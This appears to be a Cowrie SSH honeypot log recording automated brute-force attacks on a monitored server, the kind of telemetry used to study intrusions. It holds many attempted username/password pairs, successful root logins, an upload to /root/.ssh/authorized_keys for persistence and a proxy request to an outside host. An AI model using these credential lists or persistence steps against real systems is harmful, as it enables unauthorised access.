{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:15:13.694953Z","src_ip":"212.227.235.229","session":"99fbd22dbdb7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:15:13.696120Z","src_ip":"212.227.235.229","session":"99fbd22dbdb7"}
{"eventid":"cowrie.login.failed","username":"debian","password":"Welcome1","message":"login attempt [debian/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-08T23:15:13.794189Z","src_ip":"212.227.235.229","session":"cedfb8854113"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40810,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc6ea5dbea12","protocol":"ssh","message":"New connection: 212.227.235.229:40810 (1.2.3.4:22) [session: fc6ea5dbea12]","sensor":"my-vps","timestamp":"2025-09-08T23:15:13.998599Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:15:14.000604Z","src_ip":"212.227.235.229","session":"fc6ea5dbea12"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:15:14.306868Z","src_ip":"212.227.235.229","session":"fc6ea5dbea12"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:15:15.051092Z","src_ip":"212.227.235.229","session":"cedfb8854113"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54930,"dst_ip":"1.2.3.4","dst_port":22,"session":"0af6b5c0801c","protocol":"ssh","message":"New connection: 212.227.235.229:54930 (1.2.3.4:22) [session: 0af6b5c0801c]","sensor":"my-vps","timestamp":"2025-09-08T23:15:15.356893Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:15:15.358096Z","src_ip":"212.227.235.229","session":"0af6b5c0801c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:15:15.669802Z","src_ip":"212.227.235.229","session":"0af6b5c0801c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:15:15.770426Z","src_ip":"212.227.235.229","session":"fc6ea5dbea12"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"123456789","message":"login attempt [tomcat/123456789] failed","sensor":"my-vps","timestamp":"2025-09-08T23:15:16.957090Z","src_ip":"212.227.235.229","session":"0af6b5c0801c"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:15:17.083442Z","src_ip":"212.227.235.229","session":"fc6ea5dbea12"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46914,"dst_ip":"1.2.3.4","dst_port":22,"session":"408f58222c77","protocol":"ssh","message":"New connection: 212.227.235.229:46914 (1.2.3.4:22) [session: 408f58222c77]","sensor":"my-vps","timestamp":"2025-09-08T23:15:17.392729Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:15:17.393655Z","src_ip":"212.227.235.229","session":"408f58222c77"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:15:17.704436Z","src_ip":"212.227.235.229","session":"408f58222c77"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:15:18.271410Z","src_ip":"212.227.235.229","session":"0af6b5c0801c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:15:18.974264Z","src_ip":"212.227.235.229","session":"408f58222c77"}
{"eventid":"cowrie.session.closed","duration":"9.4","message":"Connection lost after 9.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:15:19.274814Z","src_ip":"212.227.235.229","session":"99fbd22dbdb7"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:15:19.281056Z","src_ip":"212.227.235.229","session":"408f58222c77"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48876,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc738c248135","protocol":"ssh","message":"New connection: 212.227.235.229:48876 (1.2.3.4:22) [session: bc738c248135]","sensor":"my-vps","timestamp":"2025-09-08T23:15:33.156794Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:15:33.158425Z","src_ip":"212.227.235.229","session":"bc738c248135"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:15:33.256165Z","src_ip":"212.227.235.229","session":"bc738c248135"}
{"eventid":"cowrie.login.failed","username":"dolphins","password":"123456789","message":"login attempt [dolphins/123456789] failed","sensor":"my-vps","timestamp":"2025-09-08T23:15:33.643683Z","src_ip":"212.227.235.229","session":"bc738c248135"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:15:34.741719Z","src_ip":"212.227.235.229","session":"bc738c248135"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":3485,"dst_ip":"1.2.3.4","dst_port":22,"session":"a17627783386","protocol":"ssh","message":"New connection: 212.227.125.160:3485 (1.2.3.4:22) [session: a17627783386]","sensor":"my-vps","timestamp":"2025-09-08T23:15:38.977055Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:15:38.978154Z","src_ip":"212.227.125.160","session":"a17627783386"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":3741,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8e7bd27160f","protocol":"ssh","message":"New connection: 212.227.125.160:3741 (1.2.3.4:22) [session: a8e7bd27160f]","sensor":"my-vps","timestamp":"2025-09-08T23:15:39.089381Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T23:15:39.090876Z","src_ip":"212.227.125.160","session":"a8e7bd27160f"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T23:15:39.201648Z","src_ip":"212.227.125.160","session":"a8e7bd27160f"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:15:39.648838Z","src_ip":"212.227.125.160","session":"a8e7bd27160f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T23:15:39.761793Z","session":"a8e7bd27160f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42944,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bbe67a97902","protocol":"ssh","message":"New connection: 212.227.235.229:42944 (1.2.3.4:22) [session: 5bbe67a97902]","sensor":"my-vps","timestamp":"2025-09-08T23:16:27.377203Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:16:27.381391Z","src_ip":"212.227.235.229","session":"5bbe67a97902"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:16:27.513555Z","src_ip":"212.227.235.229","session":"5bbe67a97902"}
{"eventid":"cowrie.login.failed","username":"steam","password":"12345678","message":"login attempt [steam/12345678] failed","sensor":"my-vps","timestamp":"2025-09-08T23:16:28.064304Z","src_ip":"212.227.235.229","session":"5bbe67a97902"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:16:29.210907Z","src_ip":"212.227.235.229","session":"5bbe67a97902"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38830,"dst_ip":"1.2.3.4","dst_port":22,"session":"6da4d7c4ed51","protocol":"ssh","message":"New connection: 212.227.235.229:38830 (1.2.3.4:22) [session: 6da4d7c4ed51]","sensor":"my-vps","timestamp":"2025-09-08T23:16:34.260959Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:16:34.261780Z","src_ip":"212.227.235.229","session":"6da4d7c4ed51"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:16:34.356838Z","src_ip":"212.227.235.229","session":"6da4d7c4ed51"}
{"eventid":"cowrie.login.failed","username":"muhammed","password":"muhammed1234","message":"login attempt [muhammed/muhammed1234] failed","sensor":"my-vps","timestamp":"2025-09-08T23:16:34.754158Z","src_ip":"212.227.235.229","session":"6da4d7c4ed51"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:16:35.852351Z","src_ip":"212.227.235.229","session":"6da4d7c4ed51"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40996,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e80fdd5b0b4","protocol":"ssh","message":"New connection: 212.227.235.229:40996 (1.2.3.4:22) [session: 5e80fdd5b0b4]","sensor":"my-vps","timestamp":"2025-09-08T23:16:36.872208Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:16:36.873239Z","src_ip":"212.227.235.229","session":"5e80fdd5b0b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52856,"dst_ip":"1.2.3.4","dst_port":22,"session":"758af845385c","protocol":"ssh","message":"New connection: 212.227.235.229:52856 (1.2.3.4:22) [session: 758af845385c]","sensor":"my-vps","timestamp":"2025-09-08T23:16:37.038933Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:16:37.039848Z","src_ip":"212.227.235.229","session":"758af845385c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:16:37.124665Z","src_ip":"212.227.235.229","session":"5e80fdd5b0b4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:16:37.350041Z","src_ip":"212.227.235.229","session":"758af845385c"}
{"eventid":"cowrie.login.failed","username":"deployer","password":"password123","message":"login attempt [deployer/password123] failed","sensor":"my-vps","timestamp":"2025-09-08T23:16:38.172342Z","src_ip":"212.227.235.229","session":"5e80fdd5b0b4"}
{"eventid":"cowrie.login.failed","username":"user","password":"Password","message":"login attempt [user/Password] failed","sensor":"my-vps","timestamp":"2025-09-08T23:16:38.591565Z","src_ip":"212.227.235.229","session":"758af845385c"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:16:39.425764Z","src_ip":"212.227.235.229","session":"5e80fdd5b0b4"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:16:39.903895Z","src_ip":"212.227.235.229","session":"758af845385c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60750,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d5d15457b8c","protocol":"ssh","message":"New connection: 212.227.235.229:60750 (1.2.3.4:22) [session: 6d5d15457b8c]","sensor":"my-vps","timestamp":"2025-09-08T23:16:44.082835Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:16:44.084347Z","src_ip":"212.227.235.229","session":"6d5d15457b8c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-ni